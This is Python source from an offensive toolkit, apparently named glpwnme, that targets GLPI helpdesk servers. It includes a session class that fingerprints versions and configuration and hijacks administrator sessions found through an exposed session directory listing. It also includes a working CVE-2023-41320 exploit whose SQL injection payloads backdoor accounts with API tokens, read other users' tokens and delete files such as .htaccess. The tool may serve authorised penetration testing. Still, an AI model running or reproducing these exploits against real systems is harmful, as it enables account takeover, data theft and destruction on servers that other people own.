        if(self.glpi_infos.plugins is None and r.status_code == HTTPStatus.OK):
            self.glpi_infos.plugins = GlpiUtils.extract_plugins(r.text)

    def get_nearest_glpi_version_from_cookie(self, cookie_string):
        """
        Get the nearest cookie version from glpi cookie's length
        """
        for cookie_key_val in map(lambda x: x.split('='), cookie_string.split(";")):
            if len(cookie_key_val) == 2:
                cookie_name = cookie_key_val[0].strip()
                if(cookie_name.startswith("glpi_") and not cookie_name.endswith("rememberme")):
                    if len(cookie_name) == 128 + len("glpi_"):
                        self.glpi_infos.glpi_nearest_version = "11.0"
                        break
                    if len(cookie_name) == 32 + len("glpi_"):
                        self.glpi_infos.glpi_nearest_version = "10.0"
                        break

    def init_session(self):
        """
        Init the current instance by trying to recover
        some informations.

        If credentials are provided try to use them
        """
        try:
            if(self.credentials.username or self.credentials.token):
                login_status = self.login_with_credentials(cookie_allowed=False)
                if login_status:
                    self._set_infos(GlpiUtils.extract_version_from_html(self.login_infos["after_login_response"].text))
                    self.profiles = GlpiUtils.extract_user_profiles(self.login_infos["after_login_response"].text)

                else:
                    raise BadCredentialsException("The credentials provided are not valid")

        except BadCredentialsException as e:
            Log.err(e)
            Log.err("Maybe you forgot the [i]--auth[/i] option ?")
            exit(0)

        except Exception as e:
            Log.err(e)
            Log.err("Use the [i]--no-init[/i] option if the error persist")
            exit(0)

        self.get_php_version()
        self.get_version()
        self.get_root_dir()
        self.get_api_status()
        self.get_inventory_status()
        self.get_password_forget_enable()
        self.check_session_dir_listing()
        self._check_glpi_config()
        self.show_infos()

        if self.login_infos.get("after_login_url"):
            self.logout()

    def check_session_dir_listing(self):
        """
        Check if session dir listing is enable, and user can recover session.
        This behavior is not default and shall be reported, it might
        happen when the .htaccess has been removed during installed,
        or not copied when upgrading with existing datas.

        I see this sometime :D
        """
        res = self.get("/files/_sessions/", allow_redirects=False)
        if(res.status_code == HTTPStatus.OK
           and '<title>Index of' in res.text):
            self.glpi_infos.session_dir_listing = True
        else:
            self.glpi_infos.session_dir_listing = False

    def find_admin_user_from_dir_listing(self):
        """
        Find an Administrator session from the dir listing page

        :return: The session cookie to use for being administrator
        :rtype: str
        """
        RE_SESSION = re.compile(r'sess_([a-zA-Z0-9]+)')
        ADMIN_URL = "/front/auth.settings.php"

        res = self.get("/files/_sessions/?C=S;O=D", allow_redirects=False)
        cookies = self.get_login_cookie()
        if not cookies:
            self.get("/index.php")
            cookies = self.get_login_cookie()
            if not cookies:
                return None

        cookie_name = cookies[0].split("=")[0]
        for cookie_val in set(re.findall(RE_SESSION, res.text)):
            self.set_login_cookie(f"{cookie_name}={cookie_val}")

            is_admin = self.sess.get(self.r(ADMIN_URL), allow_redirects=False)
            if(is_admin.status_code != HTTPStatus.FOUND
                and not GlpiUtils.is_access_denied(is_admin.text)):
                return cookie_val
        return None

    def is_extension_allowed(self, extension="php"):
        """
        Recover if an extension is available on the remote target

        :return: Whether or not the extension is available
        :rtype: Bool
        """
        url = f"/front/documenttype.php?as_map=0&browse=0&criteria[0][link]=AND&criteria[0][field]=3&criteria[0][searchtype]=equals&criteria[0][value]={extension}&search=&itemtype=DocumentType"
        res = self.get(url)
        table = GlpiUtils.extract_table(res.content)
        if not table.get("Extension"):
            return False

        if(table.get('Authorized upload', [])[0].strip().lower() == "yes"
            and table.get('Extension', [])[0].strip().lower() == "php"):
            return True
        return False

    def get_inventory_status(self):
        """
        Check whether or not the inventory is enable on the target
        """
        res = self.get("/front/inventory.php")
        if(res.status_code == HTTPStatus.NOT_FOUND
           or "Inventory is disabled" in res.text):
            self.glpi_infos.inventory_status = False
        else:
            self.glpi_infos.inventory_status = True

    def _hook_password_forget_config(self, response):
        """
        Check password forget config if not already checked
        """
        if self.glpi_infos.password_forget_enable is None:
            if(response.status_code == HTTPStatus.OK
               and "/front/lostpassword.php" in response.text):
                self.glpi_infos.password_forget_enable = True
            else:
                self.glpi_infos.password_forget_enable = False

    def get_password_forget_enable(self):
        """
        Check whether or not the password forget feature is enable or not
        """
        if self.glpi_infos.password_forget_enable is None:
            self._hook_password_forget_config(self.get("/"))

    def get_redirect_message(self):
        """
        Return the redirect message

        :return: The message for redirect
        :rtype: List[str]
        """
        res = self.get("/ajax/displayMessageAfterRedirect.php", allow_redirects=False)
        return GlpiUtils.extract_redirect_message(res.text)

    def get_api_status(self):
        """
        Recover the API status of the target instance

        GLPI before 0.90.5 was not existing,
             before 9.2.3 send "Access Denied" on apirest request,
             by now it send a HTTP/400 Error.
        """
        res = self.get("/apirest.php")
        if res.status_code != HTTPStatus.BAD_REQUEST:
            if GlpiUtils.is_access_denied(res.content):
                Log.msg(f"GLPI version is < 9.2.3")

            elif res.status_code == HTTPStatus.NOT_FOUND:
                Log.msg("GLPI version is <= 0.90.5 (really old) or [u red]maybe the target is not a GLPI[/u red]")

            else:
                self.glpi_infos.api_status = True

    def _get_url(self, url):
        """
        Get the full url from the argument

        :return: The full url to the route
        :rtype: str
        """
        if self.target in url:
            return url
        return self.r(url)

    def refresh_csrf_token(self):
        """
        Refresh the CSRF token for post usage
        """
        if not self.csrf_token:
            if self.login_infos.get("after_login_url"):
                res = self.get(self.login_infos["after_login_url"])
            else:
                res = self.get("/")
            self.csrf_token = GlpiUtils.extract_csrf(res.content)

    def get(self, url, **kwargs):
        """
        Shortcut for session.get
        """
        url = self._get_url(url)
        return self.sess.get(url, verify=False, **kwargs)

    def logout(self):
        """
        Logout from the current session
        """
        self.get("/front/logout.php?noAUTO=1")
        self.login_infos["after_login_url"] = None
        self.login_infos["after_login_response"] = None

        # For a real logout we really need to clear the glpi cookie in the session
        # However we will keep other cookies such as the remember me, so the login
        # can be done through cookies or header
        for name, value in self.sess.cookies.get_dict().items():
            if re.match(r"^glpi_[a-f0-9]+$", name):
                del self.sess.cookies[name]

    def post(self, url, **kwargs):
        """
        Shortcut for session.post
        It will also automatically add the CSRF token for the requests
        """
        url = self._get_url(url)
        self.refresh_csrf_token()
        if("data" in kwargs.keys()
           and "_glpi_csrf_token" not in kwargs["data"]
           and isinstance(kwargs["data"], dict)):
            kwargs["data"]["_glpi_csrf_token"] = self.csrf_token

        path = urlparse(url).path.lower()
        if(path.find("/ajax/") != -1 or path.find("/genericajaxcrud") != -1):
            # Ajax requests use the csrf token inside a header
            if "headers" in kwargs.keys():
                kwargs["headers"]["X-Glpi-Csrf-Token"] = self.csrf_token
            else:
                kwargs["headers"] = {"X-Glpi-Csrf-Token": self.csrf_token}
            # Set header to an Ajax call
            kwargs["headers"]["X-Requested-With"] = "XMLHttpRequest"

        return self.sess.post(url, verify=False, **kwargs)

    def r(self, route):
        """
        Function to build a route quickly

        :param route: The route to add to the target url
        :type route: str

        :return: The full url to the route
        :rtype: str
        """
        return self.target + '/' + route.lstrip("/")

    @skip_check_when_version("<", "10.0.7") # ProxyRouter appears on this version
    @skip_check_when_version(">=", "10.0.18") # You can no longer upload ".php" files
    def _check_glpi_config(self):
        """
        Check if the config of the GLPI Instance is safe.
        If no result is shown, it does not mean AT ALL that the config is safe
        """
        if self.glpi_infos.is_config_safe is None:
            # New check based on the comportment of the ProxyRouter class
            res = self.get("/plugins/test/idontexists.xml", allow_redirects=False)
            if res.status_code == HTTPStatus.FORBIDDEN:
                self.glpi_infos.is_config_safe = True
            else:
                self.glpi_infos.is_config_safe = False

    def get_privilege(self):
        """
        Recover the privilege of the current glpi session
        """
        self.privilege = ""

    def get_php_version(self):
        """
        Return the php version if found
        Also checks silently for the php backdoored version

        :return: None
        """
        if self.glpi_infos.php_version is None:
            if self.login_infos.get("after_login_response"):
                self._set_infos(GlpiUtils.extract_php_version(self.login_infos["after_login_response"].headers))
            else:
                self._set_infos(GlpiUtils.extract_php_version(self.get("/").headers))

        if self.glpi_infos.php_version == "8.1.0-dev":
            Log.msg(":skull: [bold]PHP Backdoor[/bold] seems available on remote target")

    def get_version(self):
        """
        Recover the current glpi version from the target and
        set it locally

        :return: None
        """
        if self.glpi_infos.glpi_version is None:
            self._get_version_with_map()

        if self.glpi_infos.glpi_version is None:
            self._get_version_with_telemetry()

        if self.glpi_infos.glpi_version is None:
            self._get_version_from_copyright()

        if self.glpi_infos.glpi_version is None:
            self._find_version_from_static()

        if self.glpi_infos.glpi_version is None:
            if not self.glpi_infos.root_dir:
                self.get_root_dir()

            if self.glpi_infos.root_dir:
                self._try_guess_version(self.glpi_infos.root_dir)

        if self.glpi_infos.glpi_version is None:
            Log.log(":warning-emoji: Could not identify GLPI version, "
                    "[b]using an approximate version[/b]")
            if self.glpi_infos.glpi_nearest_version:
                Log.log(f"Using approximate version: {self.glpi_infos.glpi_nearest_version}")
                self.glpi_infos.glpi_version = self.glpi_infos.glpi_nearest_version

    def _find_version_given_dict(self, version_dict):
        """
        Find the version associated to a dict
        """
        for version, files_hash in version_dict.items():
            is_version_valid = False
            for file, expected in files_hash.items():
                res = self.get(file, allow_redirects=False)
                if not GlpiStaticFilesVersion.is_result_valid(version, file, res):
                    is_version_valid = False
                    break
                is_version_valid = True

            if is_version_valid:
                return version

    def _find_version_from_static(self):
        """
        Try to recover the target version from file hashes
        """
        major_version = self._find_version_given_dict(GlpiStaticFilesVersion.get_major())
        if major_version:
            minor_version = self._find_version_given_dict(GlpiStaticFilesVersion.get_minor_from_major(major_version))
            if minor_version:
                self.glpi_infos.glpi_version = minor_version

    def get_root_dir(self):
        """
        Try to guess the glpi root dir
        """
        if not self.glpi_infos.root_dir:
            cookies = self.sess.cookies.get_dict()
            if not cookies:
                self.get("/index.php")
                cookies = self.sess.cookies.get_dict()

            md5_hash = GlpiUtils.get_md5(cookies)
            sha512_hash = GlpiUtils.get_sha512(cookies)
            final_hash = md5_hash if md5_hash else sha512_hash
            if final_hash:
                self.glpi_infos.root_dir = GlpiUtils.guess_glpi_root_dir(final_hash, self.target)
                if self.glpi_infos.root_dir:
                    if self.glpi_infos.root_dir.find(':\\') != -1:
                        self.glpi_infos.os_used = "Windows"
                    else:
                        self.glpi_infos.os_used = "Unix"

    def _get_version_from_copyright(self):
        """
        Try to get the glpi version from the copyright if present
        """
        res = self.get("/index.php")
        self._set_infos(GlpiUtils.extract_version_from_html(res.text))

    def _set_infos(self, infos):
        """
        Set the infos without overriding the infos already set

        :param infos: The glpi infos dataclass
        :type infos: class:`GlpiInfos`
        """
        if(self.glpi_infos.glpi_version is None and infos.glpi_version is not None):
            self.glpi_infos.glpi_version = infos.glpi_version

        if(self.glpi_infos.php_version is None and infos.php_version is not None):
            self.glpi_infos.php_version = infos.php_version

        if(self.glpi_infos.os_used is None and infos.os_used is not None):
            self.glpi_infos.os_used = infos.os_used

    def show_infos(self):
        """
        Show the infos found
        """
        if self.glpi_infos.glpi_version:
            Log.msg(f"Version of glpi found: {self.glpi_infos.glpi_version}")

        if self.glpi_infos.is_config_safe == False:
            Log.msg(f"GLPI configuration is [b red]not safe[/] :skull:, "
                    "In some cases you can achieve [b red]Code Execution[/] as SuperAdmin")

        if self.glpi_infos.php_version:
            Log.msg(f"Version of php found: {self.glpi_infos.php_version}")

        if self.glpi_infos.os_used:
            Log.msg(f"Operating system found: [blue]{self.glpi_infos.os_used}[/blue]")

        if self.glpi_infos.root_dir:
            Log.msg(f"GLPI root dir found: [blue]{self.glpi_infos.root_dir}[/blue]")

        if self.glpi_infos.api_status:
            Log.msg(f"GLPI API is [green]enable[/green]")
        else:
            Log.msg(f"GLPI API is [red]disable[/red]")

        if self.glpi_infos.password_forget_enable:
            Log.msg(f"GLPI password forget is [green]enable[/green]")
        else:
            Log.msg(f"GLPI password forget is [red]disable[/red]")

        if self.glpi_infos.inventory_status:
            Log.msg("Inventory is [green]enable[/]")
        else:
            Log.msg("Inventory is [red]disable[/]")

        if self.glpi_infos.session_dir_listing:
            Log.msg(f"Wowowowowow !!! :skull: [b white on red]GLPI sessions are listed[/]"
                    f" [link={self._get_url('/files/_sessions')}]here[/link]")
            Log.msg(self._get_url('/files/_sessions'))

        if self.profiles:
            Log.msg(f"[b]Profiles[/b] of current user: [blue]{', '.join(self.profiles)}[/blue]")

        if self.glpi_infos.plugins:
            rich_plugin_display = ""
            for i, plugin in enumerate(self.glpi_infos.plugins):
                rich_plugin_display += f"[blue]{plugin}[/blue]"
                if i < len(self.glpi_infos.plugins) - 1:
                    rich_plugin_display += ", "
            Log.msg(f"Plugins in used: {rich_plugin_display}")

    @skip_check_when_version(">=", "11.0") # From this version glpi no longer disclose its version number
    def _get_version_with_map(self):
        """
        Recover the current glpi version
        """
        for js_files in ("/public/lib/photoswipe.js.map", "/public/lib/cytoscape.js.map"):
            res = self.sess.get(self.r(js_files), verify=False, allow_redirects=False)
            if res.status_code == HTTPStatus.OK:
                self._set_infos(GlpiUtils.extract_version_from_map(res.content))

            if self.glpi_infos.glpi_version is not None:
                break

    @skip_check_when_version(">", "9.5.5")
    def _get_version_with_telemetry(self):
        """
        Recover the version of glpi with the telemetry
        This endpoint also recover the system information that might
        be needed
        """
        res = self.get("/ajax/telemetry.php", allow_redirects=False)
        if res.status_code == HTTPStatus.OK:
            self._set_infos(GlpiUtils.extract_infos_from_telemetry(res.text))

    def _try_guess_version(self, root_dir):
        """
        Try to guess the version from the signature in the DOM

        Both glpi 10 and glpi 11 creates hash using sha1
        """
        res = self.get("/index.php")
        sha1_hash = GlpiUtils.extract_sha1_hash(res.content)
        if len(sha1_hash) == 40:
            version = GlpiUtils.guess_glpi_version(sha1_hash, root_dir, self.current_url)
            if not version:
                Log.err(f"Failed to guess glpi version...")
            else:
                self.glpi_infos.glpi_version = version
        else:
            self.glpi_infos.glpi_version = sha1_hash

    def get_login_cookie(self):
        """
        Return the cookie neccessary for login to glpi instance

        :return: The cookies for glpi
        :rtype: List[str]
        """
        glpi_cookies = []
        for name, value in self.sess.cookies.get_dict().items():
            if name.startswith("glpi_"):
                glpi_cookies.append(f"{name}={value}")
        return glpi_cookies

    def set_login_cookie(self, val):
        """
        Set the cookie to login to the desired value

        :param val: The new value of the glpi cookie
        :type val: str
        """
        for name, value in self.sess.cookies.get_dict().items():
            if re.match(r"^glpi_[a-f0-9]+$", name):
                # self.sess.cookies.set(name, None)
                del self.sess.cookies[name]
                # self.sess.cookies.set(name, val)
                break

        for cookie in val.strip(";").split(";"):
            cookie_name, cookie_val = cookie.split("=", 1)[0].strip(), cookie.split("=", 1)[1].strip()
            self.sess.cookies.set(cookie_name, cookie_val)

    def get_username(self):
        """
        Recover the current username of the session
        """
        user = {"name": None, "id": None}
        res = self.get("/ajax/common.tabs.php?_target=/front/preference.php&_itemtype=Preference&_glpi_tab=User")
        soup = BeautifulSoup(res.text, "html.parser")
        items = soup.findAll("input", attrs={"type":"hidden"})

        username = soup.find("input", attrs={"type":"hidden", "name": "name"})
        user["name"] = GlpiUtils.extract_attr(username, "value")

        user_id = soup.find("input", attrs={"type":"hidden", "name": "id"})
        user["id"] = GlpiUtils.extract_attr(user_id, "value")
        return user

    def get_user_data(self):
        """
        Recover the user data

        :return: The user's data
        :rtype: class:`Response`
        """
        return self.get("/ajax/common.tabs.php?_target=/front/preference.php&_itemtype=Preference&_glpi_tab=User")

    def has_login_header(self):
        """
        Check if creadentials are given through headers
        
        :return: Whether or not headers contains login infos
        :rtype: Bool
        """
        return self.sess.headers.get("Authorization") is not None

    def _has_logged_in(self, url_after_login):
        """
        Check whether or not you are logged in

        :param url_after_login: The url redirected to after a post to /front/login.php
        :type url_after_login: str

        :rtype: bool
        """
        if not url_after_login:
            # Not redirected, then not logged in
            return LoginResult.FAILED

        url_after_login = urlparse(url_after_login)

        # Now that we know to which url we have been redirected to
        # we can operate on it
        if(("/index.php" in url_after_login.path or url_after_login.path.strip("/") == "")
            and "error" in url_after_login.query):
            # login.php could redirect to /index.php?error=[12]
            # or /?error=[12]
            return LoginResult.FAILED
        if "/front/login.php" in url_after_login.path:
            # If we are on /front/login.php then not logged in
            return LoginResult.FAILED
        if "/MFA/" in url_after_login.path:
            # Special case where login requires MFA
            return LoginResult.MFA_REQUIRED
        return LoginResult.SUCCESS

    def _mfa_login(self, code):
        """
        Currently in /MFA/Prompt, sending totp
        code to server for authentication

        :return: True if mfa authentication succeed, False otherwise
        :rtype: bool
        """
        result = self.post("/MFA/Verify", data={"totp_code": code})
        if result.status_code in (HTTPStatus.BAD_REQUEST, HTTPStatus.UNAUTHORIZED):
            return False
        current_url = urlparse(result.url)
        current_path = current_url.path.lower()
        if not("/mfa/verify" in current_path
               or "/index.php" in current_path # index.php too
               or "/front/login.php" in current_path # Not login.php
               or current_path.strip("/") == ""): # index.php
            self.login_infos["after_login_response"] = result
            self.login_infos["after_login_url"] = self.current_url
            return True
        return False

    def check_logged_in(self):
        """
        Automatically check that we are logged in by
        making a request to /index.php

        :return: Whether or not the current session is authenticated
        :rtype: bool
        """
        return GlpiUtils.extract_redirect(self.get("/index.php", allow_redirects=False)) != ""

    def login_with_credentials(self, cookie_allowed=True):
        """
        Login with the credentials provided at the initialisation

        :raises ValueError: If no credentials has been provided

        :return: The boolean if login failed or not
        :rtype: bool
        """
        if self.credentials:
            if self.credentials.username and self.credentials.password:
                other = {}
                if self.credentials.auth is not None:
                    other["auth"] = self.credentials.auth
                login_result = self.login(self.credentials.username, self.credentials.password, profile=self.credentials.profile, others=other, no_auto=True)
                if login_result == LoginResult.MFA_REQUIRED:
                    if self.credentials.otp is None:
                        raise MissingMFAException("MFA is required, use [cyan]--otp[/cyan] to login")
                    if not self._mfa_login(self.credentials.otp):
                        raise BadCredentialsException("Invalid otp code")
                    return True
                return login_result == LoginResult.SUCCESS

            elif self.credentials.token:
                return self.login("", "", profile=self.credentials.profile, others={"user_token": self.credentials.token}, no_auto=False) == LoginResult.SUCCESS

            elif(cookie_allowed and self.credentials.cookie):
                self.set_login_cookie(self.credentials.cookie)
                if self.credentials.profile:
                    self.change_profile(self.credentials.profile)
                return self.check_logged_in()

        if self.has_login_header():
            return self.check_logged_in()

        if self.credentials.server_user or self.credentials.server_password:
            # Case when mod_auth_<something> is used in front of glpi, and
            # GLPI used for instance $_SERVER["REMOTE_USER"]
            return self.check_logged_in()

        if self.skip_check:
            # Little bypass to run exploits when manually
            # getting the cookie
            return True

        raise ValueError("Credentials are missing for login")

    def get_fresh_session_copy(self):
        """
        Return an empty session object ready to use, with the same parameters
        as asked

        :return: The new session initialized with the same attributes
        :rtype: class:`AnyAuthSession`
        """
        new_session = AnyAuthSession(self.credentials.server_user, self.credentials.server_password)
        new_session.proxies = self.sess.proxies.copy()
        new_session.headers = self.sess.headers.copy()
        new_session.auth = self.sess.auth

        return new_session

    def extract_glpi_var(self, var_name):
        """
        Extract a glpi variable from the config page

        :param var_name: The name of the variable to extract
        :type var_name: str

        :return: The value of the variable
        :rtype: str
        """
        res = self.get("/ajax/common.tabs.php?_target=/front/config.form.php&_itemtype=Config&_glpi_tab=Config$5&id=1")
        glpi_tmp_dir_re = re.compile(fr'{var_name}: ("?)(.*)(\1)')
        html_text = html.unescape(res.text)
        matches = re.findall(glpi_tmp_dir_re, html_text)
        if(matches and len(matches[0]) == 3):
            return matches[0][1]

    def upload_file(self, filename, file_content):
        """
        Upload a file on the target

        :param filename: The name of the file to upload
        :type filename: str

        :param file_content: The content of the file
        :type file_content: Union[str, bytes]

        :return: The url path to the file
        :rtype: str
        """
        file_data = {
                "name": (None, "_uploader_picture"),
                "_uploader_picture[]": (filename, file_content)
            }

        res = self.post("/ajax/fileupload.php", files=file_data)
        json_res = res.json()
        upload_res = json_res["_uploader_picture"][0]
        return upload_res

    def delete_file(self, filename):
        """
        Remove a file previously uploaded

        :param filename: The filename to delete
        :type filename: str

        :return: True if the file was deleted, False otherwise
        :rtype: bool
        """
        file_data = {
                "name": (None, "_uploader_picture"),
                "_uploader_picture[]": (filename, "")
            }
        res = self.post(f"/ajax/fileupload.php?_method=DELETE&_uploader_picture[]={filename}", data={"name": "_uploader_picture"})
        try:
            json_res = res.json()[filename]
            if json_res:
                return True
        except Exception as e:
            Log.err(e)
        return False

    def change_profile(self, profile):
        """
        Change the profile to use

        :param profile: The profile to use
        :type profile: Union[int str]
        """
        if not profile:
            return None

        if not profile.isdigit():
            profile_name = profile.replace("-", "").capitalize()
            profile = Privs[profile_name].value

        self.post("/front/helpdesk.public.php", data={"newprofile": profile})

    def login(self, username, password, profile=None, others=None, verbose=True, no_auto=False):
        """
        Login on glpi, this functions will always check for login

        :param username: The username
        :type username: str

        :param password: The password
        :type password: str

        :param others: Other infos to login if needed
        :type others: dict

        :param no_auto: Whether or not to use auto login (cookie, api_token, ...)
        :type no_auto: bool

        :return: Enum Success, Failure or Mfa required
        :rtype: class:`LoginResult`
        """
        no_auto_query = ""
        if no_auto:
            no_auto_query = "?noAUTO=1"
        login_html = self.get("/index.php?noAUTO=1")

        self._hook_password_forget_config(login_html)

        fields = GlpiUtils.extract_login_field(login_html.content)
        csrf_token = GlpiUtils.extract_csrf(login_html.content)

        post_data = {fields["login"]: username,
                     fields["password"]: password,
                     "_glpi_csrf_token": csrf_token}

        if others:
            post_data = {**post_data, **others}

            if(others.get("auth") and verbose):
                auth_used = others.get("auth")
                all_auths = GlpiUtils.extract_auth(login_html.text)
                all_auths.append("cookie")

                if(all_auths and not auth_used in all_auths):
                    Log.err(f"The auth parameter [gold3]{auth_used}[/] seems invalid"
                            f", maybe use one of the following\n\t- [b]{', '.join(all_auths)}[/]")

        res = self.sess.post(self.r(f"/front/login.php{no_auto_query}"), data=post_data, verify=False, allow_redirects=False)
        redirect_url = GlpiUtils.extract_redirect(res)
        login_result = self._has_logged_in(redirect_url)
        if login_result == LoginResult.SUCCESS:
            res = self.get(redirect_url)
            self.privilege = Privs["User"] # TODO: improve the priv setup
            if profile:
                self.change_profile(profile)
            self.login_infos["after_login_response"] = res
            self.login_infos["after_login_url"] = self.current_url
            return login_result
        return login_result



import time
from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils, LoginResult

class CVE_2023_41320(GlpiExploit):
    """
    This CVE abuse a SQL Injection in an update clause to elevate the privilege of the current user

    @author RIOUX Guilhem
    @cvss 8.1
    @name CVE_2023_41320
    """
    min_version = "10.0.0"
    max_version = "10.0.10"
    _impacts = "SQLi, Privilege Escalation, File Delete, Database Leak, RCE"
    _privilege = "User"
    _is_check_opsec_safe = False # Check is not opsec safe as it update some table fields

    field = "realname" # field on which to put content

    def _make_payload(self, field, payload, condition):
        """
        Make the sql payload ready to be injected

        :param field: In which field to store the result
        :type field: str

        :param payload: The sql payload to use, Do not use `FROM glpi_users` inside as
          it will break the sql syntax
        :type payload: str

        :param condition: The condition which is mandatory, to not apply an update everywhere
        :type condition: str
        """
        return f"', {field}={payload} WHERE {condition}; -- '"

    def send_payload(self, payload):
        """
        Send the payload to the target

        :param payload: The payload to send
        :type payload: str
        """
        return self.post("/ajax/itillayout.php", data={"itil_layout": payload})

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allow to execute arbitrary query inside an [b]UPDATE[/] statement in the [i]glpi_users[/] table\n"
        infos += "It can be used to backdoor any account, or change db fields.\n"
        infos += "Also you shall be able to recover any db value if you need\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Backdoor an account named glpi[/]\n"
        infos += "--run -O account_target=glpi\n"

        infos += "\n[grey66]# Deleting the files/.htaccess on the target[/]\n"
        infos += "--run -O delete_file=../.htaccess\n"
        infos += "\nExploit is [red b]Dangerous[/]"
        return infos

    def _recover_api_token(self, username, user_id):
        """
        Recover the api token from the user username

        :param username: The target username to exploit
        :type username: str

        :param user_id: The id of the current user
        :type user_id: str

        :return: The api token of the targt if found, else empty string
        :rtype: str
        """
        user_hex = GlpiUtils.to_hex(username)
        api_payload = f'(SELECT api_token from (select * from glpi_users) as temp_table where name={user_hex})'
        payload = self._make_payload(field="phone2",
                                     payload=api_payload,
                                     condition=f"id={user_id}")
        self.send_payload(payload)
        res = self.glpi_session.get_user_data()
        api_token = GlpiUtils.extract_user_field(res.text, "phone2")
        return api_token

    def check(self):
        """
        Check if the target is vulnerable
        The payload actually just sleep for 3 seconds and reset the
        itil_layout to NULL (default value) for the user with
        ```id=2```
        """
        payload = self._make_payload(field="itil_layout",
                                     payload="(SELECT SLEEP(3) UNION ALL SELECT NULL LIMIT 1 OFFSET 1)",
                                     condition="is_active=1 LIMIT 1")
        start_time = time.time()
        res = self.send_payload(payload)
        if time.time() - start_time > 3.0:
            return True
        return False

    def _backdoor_account(self, account_target, api_key):
        """
        Backdoor account on glpi by setting an api key
        """
        current_user = self.glpi_session.get_username()
        user_id = current_user["id"]
        if not user_id:
            raise LookupError("Cannot find user ID !")

        # print(self._recover_api_token(account_target, user_id))
        # exit(0)
        Log.log(f"Api key generated: [b]{api_key}[/b]")
        Log.log(f"Trying to backdoor account {account_target}")


        current_user = self.glpi_session.get_username()
        user_id = current_user["id"]
        if not user_id:
            raise LookupError("Cannot find user ID !")

        current_api_key = self._recover_api_token(account_target, user_id)
        if not current_api_key:
            self._write_log(f"Backdooring account '{account_target}' with API Token: '{api_key}'")

            account_hex = GlpiUtils.to_hex(account_target)
            api_key_hex = GlpiUtils.to_hex(api_key)

            payload = self._make_payload(field="api_token",
                                         payload=api_key_hex,
                                         condition=f"name={account_hex}")
            Log.log(f"Running sql command:\n```UPDATE glpi_users SET itil_layout='{payload}'```")
            self.send_payload(payload)

        else:
            Log.msg(f"API Key already set: {current_api_key}")
            api_key = current_api_key

        self.glpi_session.logout()
        if self.glpi_session.login("", "", others={"user_token": api_key}) == LoginResult.SUCCESS:
            Log.msg(f"Backdoor worked, cookie:")
            print("; ".join(self.glpi_session.get_login_cookie()))
        else:
            Log.err(f"Could not login with API Token...")

    def _delete_file(self, file_to_delete):
        """
        Delete a file on the target from the current_path

        :param file_to_delete: The file to delete on the target
        :type file_to_delete: str
        """
        default_htaccess = "<IfModule mod_authz_core.c>\nRequire all denied\n</IfModule>\n"
        default_htaccess += "<IfModule !mod_authz_core.c>\ndeny from all\n</IfModule>\n"

        current_user = self.glpi_session.get_username()
        user_id = current_user["id"]
        if not user_id:
            raise LookupError("Cannot find user ID !")

        file_to_delete_hex = GlpiUtils.to_hex(file_to_delete)

        if Log.ask(f"Delete the file [b]GLPI_ROOT/files/_pictures/{file_to_delete}[/b]"):
            payload = self._make_payload(field="picture",
                                         payload=file_to_delete_hex,
                                         condition=f"id={user_id}")
            self._write_log(f"Trying to delete the file GLPI_ROOT/files/_pictures/{file_to_delete}")
            self.send_payload(payload)

            delete_data = {"id": user_id, "_blank_picture": "1", "update": "Save"}
            self.post("/front/preference.php", data=delete_data)
            if ".htaccess" in file_to_delete:
                self._write_log(f"Restore GLPI_ROOT/files/.htaccess with the following content:\n{default_htaccess}")
            Log.log(f"File might not exists anymore")

    def run(self, account_target=None, delete_file=None):
        """
        Run the exploit on the target, it actually backdoor an account with an api key

        :raises ValueError: When parameters are missing

        :param account_target: The name of the account to backdoor
        :type account_target: str

        :param delete_file: The name of the file to delete
        :type delete_file: str
        """
        if account_target is not None:
            api_key = GlpiUtils.random_str(40)
            self._backdoor_account(account_target, api_key)

        elif delete_file is not None:
            self._delete_file(delete_file)

        else:
            raise ValueError("Please specify an option, -O 'account_target=glpi' or -O 'delete_file=test.php'")

    def clean(self, account_target):
        """
        Clean the api_token on the target account

        :param account_target: The account_target on which to reset the api token
        :type account_target: str
        """
        account_hex = GlpiUtils.to_hex(account_target)

        payload = self._make_payload(field="api_token",
                                     payload="NULL",
                                     condition=f"name={account_hex}")
        res = self.send_payload(payload)
        try:
            json_res = res.json()["success"]
            if json_res:
                self._write_log(f"Removed api_key for account {account_target}")
                Log.log(f"The account [blue]{account_target}[/blue] shall now be [b]unbackdoored[/b]")

            else:
                Log.err("Failed removing API Token")
        except:
            self._write_log(f"Failed removing api_key for account {account_target}")
            Log.err("Failed removing API Token")



import argparse
import requests
from packaging import version
from glpwnme.exploits.utils import *
from glpwnme.exploits.implementations import *
from glpwnme.exploits.orchestrator import ExploitOrchestrator
from glpwnme.exploits.logger import Log, KiddieLogger
from glpwnme.exploits.exceptions import BadCredentialsException

__all__ = ["run_cli"]

def header():
    """
    Print the header of the tool
    """
    Log.print("[b black on blue]\uE0B0 GlpwnMe [/b black on blue][blue]\uE0B0[/blue] by [b u blue]RIOUX Guilhem[/b u blue]")

class GlpwnMe:
    """
    Class running the workflow
    """
    def __init__(self):
        self.parser = argparse.ArgumentParser(description='Script to check instance of glpi')
        self.args = None

    def parse(self):
        """
        Parse the arguments needed
        """
        # Target options
        self.parser.add_argument('-t', '--target', required=True, help='Target url to attack')

        # Authentication options
        self.parser.add_argument("-u", "--username", help="Username to use")
        self.parser.add_argument("-p", "--password", help="Password to use")
        self.parser.add_argument("--token", help="Token for login into glpi")
        self.parser.add_argument("--cookie", help="Cookie value for login into glpi")
        self.parser.add_argument("--auth", help="Auth to use (default taken from glpi)")
        self.parser.add_argument("--profile", help="Profile to use (if any)")
        self.parser.add_argument("--otp", help="MFA code to use for login")

        self.parser.add_argument("-su", "--server-user", help="Username to use for server authentication", default="")
        self.parser.add_argument("-sp", "--server-password", help="Password to use for server authentication", default="")

        # Exploit options
        self.parser.add_argument("-e", "--exploit", help="The exploit to use")
        self.parser.add_argument("--run", help="Specify to run the exploit and not to check it", action="store_true")
        self.parser.add_argument("--clean", help="Specify to clean the exploit traces if implemented", action="store_true")
        self.parser.add_argument("--check", help="Specify to check the exploit if implemented", action="store_true")
        self.parser.add_argument("--check-all", help="Check all the exploits available on the target", action="store_true")
        self.parser.add_argument("--no-opsec", help="Check even if the exploit is noted as not opsec safe", action="store_false")
